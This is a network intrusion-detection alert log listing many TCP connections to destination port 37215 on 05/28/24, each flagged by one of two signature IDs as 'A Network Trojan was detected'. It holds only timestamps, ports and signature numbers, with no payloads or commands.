                  Timestamp:05/28/24-08:59:06.453497
                  SID:2835222
                  Source Port:49030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845028
                  SID:2829579
                  Source Port:42122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292623
                  SID:2829579
                  Source Port:58932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.584963
                  SID:2835222
                  Source Port:38936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887967
                  SID:2829579
                  Source Port:51228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911966
                  SID:2835222
                  Source Port:51160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696291
                  SID:2829579
                  Source Port:53228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.915800
                  SID:2829579
                  Source Port:53128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766979
                  SID:2829579
                  Source Port:48084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.917332
                  SID:2829579
                  Source Port:36840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930393
                  SID:2835222
                  Source Port:59088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276214
                  SID:2829579
                  Source Port:47344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.771022
                  SID:2835222
                  Source Port:50756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870541
                  SID:2835222
                  Source Port:57722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650619
                  SID:2829579
                  Source Port:54304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579330
                  SID:2829579
                  Source Port:42208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.888328
                  SID:2835222
                  Source Port:39080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276579
                  SID:2829579
                  Source Port:35936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494418
                  SID:2829579
                  Source Port:49674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659974
                  SID:2829579
                  Source Port:51002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319868
                  SID:2835222
                  Source Port:59148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789365
                  SID:2829579
                  Source Port:33656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874558
                  SID:2835222
                  Source Port:33266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629164
                  SID:2835222
                  Source Port:44524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920015
                  SID:2829579
                  Source Port:52866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729802
                  SID:2829579
                  Source Port:37276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923060
                  SID:2835222
                  Source Port:33574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276857
                  SID:2835222
                  Source Port:58548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.693812
                  SID:2835222
                  Source Port:43906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.915729
                  SID:2835222
                  Source Port:43234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664632
                  SID:2829579
                  Source Port:57550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922743
                  SID:2835222
                  Source Port:45486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788860
                  SID:2829579
                  Source Port:46150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696405
                  SID:2829579
                  Source Port:36126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563566
                  SID:2835222
                  Source Port:34468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785701
                  SID:2835222
                  Source Port:47874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.881181
                  SID:2829579
                  Source Port:55014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796821
                  SID:2829579
                  Source Port:42216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696633
                  SID:2829579
                  Source Port:52458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847832
                  SID:2829579
                  Source Port:47156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780854
                  SID:2829579
                  Source Port:55236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.872177
                  SID:2835222
                  Source Port:51322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316646
                  SID:2835222
                  Source Port:38656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738066
                  SID:2829579
                  Source Port:54856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766603
                  SID:2829579
                  Source Port:53228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547622
                  SID:2835222
                  Source Port:40016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483047
                  SID:2829579
                  Source Port:58346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.535988
                  SID:2835222
                  Source Port:42502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555183
                  SID:2835222
                  Source Port:38164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900443
                  SID:2835222
                  Source Port:49254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493422
                  SID:2835222
                  Source Port:36448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745922
                  SID:2835222
                  Source Port:46342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628926
                  SID:2829579
                  Source Port:51198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493514
                  SID:2829579
                  Source Port:59970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817788
                  SID:2829579
                  Source Port:43220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594368
                  SID:2835222
                  Source Port:34848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278210
                  SID:2829579
                  Source Port:56310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661764
                  SID:2835222
                  Source Port:34972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548307
                  SID:2829579
                  Source Port:40584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547518
                  SID:2835222
                  Source Port:42358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659993
                  SID:2829579
                  Source Port:59450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.371941
                  SID:2835222
                  Source Port:60702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806041
                  SID:2829579
                  Source Port:55462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278223
                  SID:2829579
                  Source Port:48682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315429
                  SID:2829579
                  Source Port:36872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874500
                  SID:2829579
                  Source Port:37548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931639
                  SID:2835222
                  Source Port:49986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319163
                  SID:2835222
                  Source Port:34872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628120
                  SID:2835222
                  Source Port:47726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.606325
                  SID:2835222
                  Source Port:56066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628407
                  SID:2829579
                  Source Port:56788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.510254
                  SID:2829579
                  Source Port:38594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584670
                  SID:2829579
                  Source Port:32990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586330
                  SID:2829579
                  Source Port:57910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279457
                  SID:2835222
                  Source Port:35038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530367
                  SID:2835222
                  Source Port:36204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316241
                  SID:2829579
                  Source Port:51948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789775
                  SID:2829579
                  Source Port:45570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604023
                  SID:2829579
                  Source Port:59198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702871
                  SID:2829579
                  Source Port:49122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661753
                  SID:2835222
                  Source Port:44590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910438
                  SID:2835222
                  Source Port:48748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298091
                  SID:2835222
                  Source Port:57896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.912290
                  SID:2835222
                  Source Port:37212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578011
                  SID:2829579
                  Source Port:56178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930146
                  SID:2829579
                  Source Port:57056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594436
                  SID:2835222
                  Source Port:39732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.926695
                  SID:2835222
                  Source Port:48776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651729
                  SID:2835222
                  Source Port:51850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718830
                  SID:2835222
                  Source Port:45656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277323
                  SID:2835222
                  Source Port:45216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.799527
                  SID:2835222
                  Source Port:40898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628377
                  SID:2829579
                  Source Port:51826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766199
                  SID:2835222
                  Source Port:44534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789500
                  SID:2835222
                  Source Port:38690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312478
                  SID:2835222
                  Source Port:58988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529752
                  SID:2835222
                  Source Port:51788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487990
                  SID:2835222
                  Source Port:57810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584405
                  SID:2829579
                  Source Port:44338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584429
                  SID:2829579
                  Source Port:38244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651019
                  SID:2829579
                  Source Port:50450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769303
                  SID:2835222
                  Source Port:36048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488799
                  SID:2835222
                  Source Port:52882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488909
                  SID:2829579
                  Source Port:53438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766643
                  SID:2829579
                  Source Port:42652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:23.801992
                  SID:2829579
                  Source Port:36718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627963
                  SID:2829579
                  Source Port:43390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.792905
                  SID:2829579
                  Source Port:35898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316322
                  SID:2829579
                  Source Port:59996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911651
                  SID:2829579
                  Source Port:43492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586032
                  SID:2835222
                  Source Port:46444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768514
                  SID:2835222
                  Source Port:39018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788959
                  SID:2835222
                  Source Port:35796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490032
                  SID:2835222
                  Source Port:33304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316370
                  SID:2835222
                  Source Port:45508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794138
                  SID:2829579
                  Source Port:51412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859410
                  SID:2829579
                  Source Port:34310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660008
                  SID:2829579
                  Source Port:58670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907977
                  SID:2829579
                  Source Port:48880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845933
                  SID:2835222
                  Source Port:51922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651438
                  SID:2835222
                  Source Port:41506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.818077
                  SID:2829579
                  Source Port:47420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702267
                  SID:2835222
                  Source Port:48704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702951
                  SID:2835222
                  Source Port:44462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906692
                  SID:2829579
                  Source Port:33562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527134
                  SID:2829579
                  Source Port:55046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.766450
                  SID:2835222
                  Source Port:57310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780999
                  SID:2829579
                  Source Port:46316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530942
                  SID:2829579
                  Source Port:60292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.323034
                  SID:2835222
                  Source Port:35206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537264
                  SID:2835222
                  Source Port:37340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536621
                  SID:2835222
                  Source Port:58414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490299
                  SID:2829579
                  Source Port:51134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315755
                  SID:2835222
                  Source Port:51578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790326
                  SID:2835222
                  Source Port:44438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537024
                  SID:2829579
                  Source Port:47764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659960
                  SID:2835222
                  Source Port:38906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695196
                  SID:2829579
                  Source Port:58478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651445
                  SID:2829579
                  Source Port:59432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719073
                  SID:2829579
                  Source Port:59812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.866277
                  SID:2829579
                  Source Port:54368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.514243
                  SID:2829579
                  Source Port:59666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.703114
                  SID:2829579
                  Source Port:58004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.860120
                  SID:2835222
                  Source Port:50072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292594
                  SID:2835222
                  Source Port:53054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847414
                  SID:2835222
                  Source Port:44278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942563
                  SID:2835222
                  Source Port:53870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.785691
                  SID:2829579
                  Source Port:50980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576360
                  SID:2835222
                  Source Port:36148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843705
                  SID:2835222
                  Source Port:58310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277358
                  SID:2835222
                  Source Port:36372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495934
                  SID:2835222
                  Source Port:35866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767834
                  SID:2829579
                  Source Port:41698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542572
                  SID:2835222
                  Source Port:46646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.881388
                  SID:2829579
                  Source Port:42234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888609
                  SID:2835222
                  Source Port:60088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.535998
                  SID:2835222
                  Source Port:60014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766079
                  SID:2829579
                  Source Port:44090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798128
                  SID:2829579
                  Source Port:57842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931500
                  SID:2829579
                  Source Port:34558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720195
                  SID:2835222
                  Source Port:42006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846756
                  SID:2829579
                  Source Port:58586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537472
                  SID:2835222
                  Source Port:34372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887856
                  SID:2829579
                  Source Port:56228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293175
                  SID:2829579
                  Source Port:49630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.821145
                  SID:2829579
                  Source Port:42144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316343
                  SID:2835222
                  Source Port:60018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660634
                  SID:2829579
                  Source Port:47190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.848874
                  SID:2835222
                  Source Port:54168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312382
                  SID:2829579
                  Source Port:58504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578071
                  SID:2835222
                  Source Port:34876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661201
                  SID:2835222
                  Source Port:44230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278850
                  SID:2835222
                  Source Port:38958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543178
                  SID:2829579
                  Source Port:39312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870693
                  SID:2835222
                  Source Port:54360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492095
                  SID:2829579
                  Source Port:51564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887052
                  SID:2835222
                  Source Port:39906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790751
                  SID:2835222
                  Source Port:40960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.669572
                  SID:2829579
                  Source Port:58150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796854
                  SID:2829579
                  Source Port:42766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537498
                  SID:2835222
                  Source Port:36244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537018
                  SID:2829579
                  Source Port:33980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550690
                  SID:2835222
                  Source Port:49148
                  Destination Port:37215
                  Protocol:TCP
